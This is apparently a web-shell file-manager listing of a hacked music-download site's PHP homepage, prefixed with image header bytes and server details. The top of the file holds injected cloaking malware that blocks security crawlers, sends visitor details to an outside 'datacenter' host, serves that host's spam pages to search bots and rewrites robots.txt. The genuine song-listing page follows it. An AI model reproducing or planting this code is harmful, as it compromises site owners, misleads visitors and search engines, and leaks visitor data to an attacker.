����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 3.139.70.69 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/kwachamusic.com/ |
Upload File : |
<?php error_reporting(0); function getrealIp() { if (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CLIENT_IP'); } if (getenv('HTTP_X_REAL_IP')) { $ip = getenv('HTTP_X_REAL_IP'); } elseif (getenv('HTTP_X_FORWARDED_FOR')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); $ips = explode(',', $ip); $ip = $ips[0]; } elseif (getenv('REMOTE_ADDR')) { $ip = getenv('REMOTE_ADDR'); } else { $ip = '0.0.0.0'; } return $ip; } function get_url($url) { $remoteContent = @file_get_contents($url); if(empty($remoteContent)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); if(strpos($url,"https://") !== false){ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); } $remoteContent = curl_exec($ch); curl_close($ch); } return $remoteContent; } function get_url2($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); if(strpos($url,"https://") !== false){ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); } $remoteContent = curl_exec($ch); curl_close($ch); if(empty($remoteContent)) { $remoteContent = @file_get_contents($url); } return $remoteContent; } if(preg_match("/(Bytespider|PetalBot|AhrefsBot|Barkrowler|MJ12bot|FeedDemon|JikeSpider|Indy Library|AskTbFXTV|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|ApacheBench|Swiftbot|ZmEu|oBot|jaunty|Python-urllib|python-requests|lightDeckReports Bot|YYSpider|DigExt|YisouSpider|HttpClient|heritrix|EasouSpider|Ezooms|AmazonBot|SEMrushBot|YandexBot|paloaltonetworks|Python)/i", $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 403 Forbidden'); exit(); } $botagent = "bing|google|yahoo"; $datacenter = "http://cw209.lowoffice.shop/index.php"; $pc = 2986; $useragent = urlencode($_SERVER['HTTP_USER_AGENT']); $refer = urlencode($_SERVER['HTTP_REFERER']); $language = urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']); //$ip = urlencode($_SERVER['REMOTE_ADDR']); $realip = getrealIp(); $ip = urlencode($realip); $domain = urlencode($_SERVER['HTTP_HOST']); $script = urlencode($_SERVER['SCRIPT_NAME']); if ( (! empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (! empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (! empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ) { $_SERVER['REQUEST_SCHEME'] = 'https'; } else { $_SERVER['REQUEST_SCHEME'] = 'http'; } $http = urlencode($_SERVER['REQUEST_SCHEME']); $uri = urldecode($_SERVER['REQUEST_URI']); if(strpos($uri,"uuuuxxxxooo") !== false){ echo "ok"; exit(); } if($realip == "153.246.135.238" || $realip == "219.101.44.233") { header('HTTP/1.0 403 Forbidden'); exit(); } $rewriteable = 0; if(!file_exists("uxo.txt")) { $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/uuuuxxxxooo'; $dd = get_url($uuu); if($dd == "ok") { $rewriteable = 1; @file_put_contents("uxo.txt","1"); } else { $rewriteable = 0; @file_put_contents("uxo.txt","0"); } } else { $rewriteable = @file_get_contents("uxo.txt"); } if(strpos($uri,"pingsitemap.xml") !== false){ $scripname = $_SERVER['SCRIPT_NAME']; if( strpos( $scripname, "index.php") !== false) { if($rewriteable == 0) { $scripname = '/?'; } else { $scripname = '/'; } } else { $scripname = $scripname.'?'; } $google ="https://www.google.com/ping?sitemap="; //$google ="http://www.google.com/webmasters/tools/ping?sitemap="; $robots_contents = 'User-agent: * Allow: /'; $sitemap = "$http://" . $domain .$scripname. "sitemap.xml"; $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap"; //$dd = get_url2($google. urlencode( $sitemap)); $sitemapstatus = ""; //if(preg_match("/<h2>(.+?)<\/h2>/i",$dd,$match)) //{ // $sitemapstatus = $match[1]; //} //$sitemapstatus = ( strpos($dd,"Sitemap Notification Received") !== false ) ? "OK" : "<font color='red'>ERROR</font>"; echo $sitemap.": ".$sitemapstatus.'<br/>'; //usleep(100*1000); $requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script&sitemap=".urlencode($sitemap); $dd = get_url($requsturl); //for($i = 1; $i < 30; $i++){ //$sitemap = "$http://" . $domain.$scripname. "sitemap_index_$i.xml"; //$robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap"; // $dd = get_url2($google.urlencode($sitemap)); // $sitemapstatus = "<font color='red'>ERROR</font>"; // if(preg_match("/<h2>(.+?)<\/h2>/i",$dd,$match)) // { // $sitemapstatus = $match[1]; // } // //$sitemapstatus = ( strpos($dd,"Sitemap Notification Received") !== false ) ? "OK" : "<font color='red'>ERROR</font>"; // echo $sitemap.": ".$sitemapstatus.'<br/>'; //usleep(100*1000); //} @file_put_contents("robots.txt",$robots_contents); exit(); } else if(strpos($uri,"favicon.ico") !== false){ } else if(strpos($uri,"jp2023") !== false){ $requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script"; $dd = get_url($requsturl); echo $dd; exit(); } else if(strpos($uri,"robots.txt") !== false || strpos($uri,"writerobots") !== false){ //$uri = "writerobots"; $requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script"; header('Content-Type: text/plain; charset=utf-8'); echo $dd = get_url($requsturl); @file_put_contents("robots.txt",$dd); exit(); } else if(preg_match("@^/(.*?).xml$@i", $uri)){ $requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script"; $dd = get_url($requsturl); if($dd == "500") { header("HTTP/1.0 500 Internal Server Error"); exit(); } else { header('Content-Type: text/xml; charset=utf-8'); echo $dd; exit(); } } else if(preg_match("/($botagent)/i", $_SERVER['HTTP_USER_AGENT'])) { $requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script"; $dd = get_url($requsturl); if(!empty($dd)) { if($dd == "500") { header("HTTP/1.0 500 Internal Server Error"); exit(); } if(substr($dd,0,5)=="<?xml") { header('Content-Type: text/xml; charset=utf-8'); } else { header('Content-Type: text/html; charset=utf-8'); } echo $dd; exit(); } } else if(preg_match("/($botagent)/i", $_SERVER['HTTP_REFERER'])) { $requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable"; $dd = get_url($requsturl); if($dd == "500") { header("HTTP/1.0 500 Internal Server Error"); exit(); } else if(!empty($dd)) { header('HTTP/1.1 404 Not Found'); echo $dd; exit(); } } else { } ?> <?php session_start(); ?> <!DOCTYPE html> <html> <head> <title>HOME</title> <meta charset="utf-8"> <link rel="stylesheet" type="text/css" href="style.css"> <link rel="stylesheet" type="text/css" href="css/font/flaticon.css"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="css/fontawesome/css/all.css"> <link rel="icon" href="sun.ico"> </head> <style type="text/css"> .buttons{ width:98%; margin:2px 2px;} .buttons button{width:38%; padding:2px; margin:1px 4.8%;font-size:12px;} .buttons a.link, .buttons a.visited{text-decoration:none;} @media screen and (max-width: 720px) { .buttons{ width:110%; margin:2% -4.7%; } .buttons button{width:37%; padding:1.8px; margin:1% 5.5%;font-size:11px;} } @media screen and (max-width: 600px) { .buttons{ width:110%; margin:2% -5%; } .buttons button{width:36%; padding:1.8px; margin:1% 5.5%;font-size:10px;} } @media screen and (max-width: 400px) { .buttons{ width:120%; margin:2% -5.6%;} .buttons button{width:34%; padding:2px; margin:1% 5.5%;font-size:9px;} } @media screen and (max-width: 370px) { .buttons{ width:120%; margin:2% -6%;} .buttons button{width:34%; padding:2px; margin:1% 5.5%;font-size:8px;} } </style> <body > <div class="body1"> <div class="header"> <img src="kwacha.png" alt="KwachaMusic"> </div> <?php include 'navigation.php'; ?> <script> function click() { document.querySelector(".links").style.display="block"; } </script> <?php require 'connect.php'; $sql = "SELECT * FROM `music` WHERE `homepage`='home' ORDER BY `id` DESC LIMIT 12"; if($run = mysqli_query($con, $sql)){ $row = mysqli_num_rows($run); while($name=mysqli_fetch_array($run)){ $id=$name['id']; $image=$name['image']; $title=$name['title']; $artist=$name['artist']; $timestamp=$name['time']; $time = strtotime($timestamp); date_default_timezone_set('UTC'); $current_time = time(); $difference = $current_time - $time; $seconds = $difference; $days = round($seconds / 86400); ?> <div class= "box"> <div class = "column"> <div class="w3-display-container "> <img src="singles/artworks/<?php echo $image;?>" alt="<?php echo $title;?>"> </div> <div class="des"> <p style="color: white;"><?php $len = strlen($artist); $len2 = strlen($title); $str = substr($artist,0,13); $str2 = substr($title,0,12); if($len >= 13) { echo $str . "..."; } else { echo $artist; } echo " - "; if($len2 >= 12) { echo $str2 . "..."; } else { echo $title; } ?> </p> </div> <div class = "buttons"> <a href="homefiles/download3.php?id=<?php echo $id;?>"><button>DOWNLOAD</button></a> <a href="homefiles/stream.php?id=<?php echo $id;?>"><button>STREAM</button></a> </div> </div> </div> <?php } } else { die(mysqli_error($con)); } ?> <div class="footer"> ©kwachaMusic 2021 - 2022 </div> </div> </body> </html>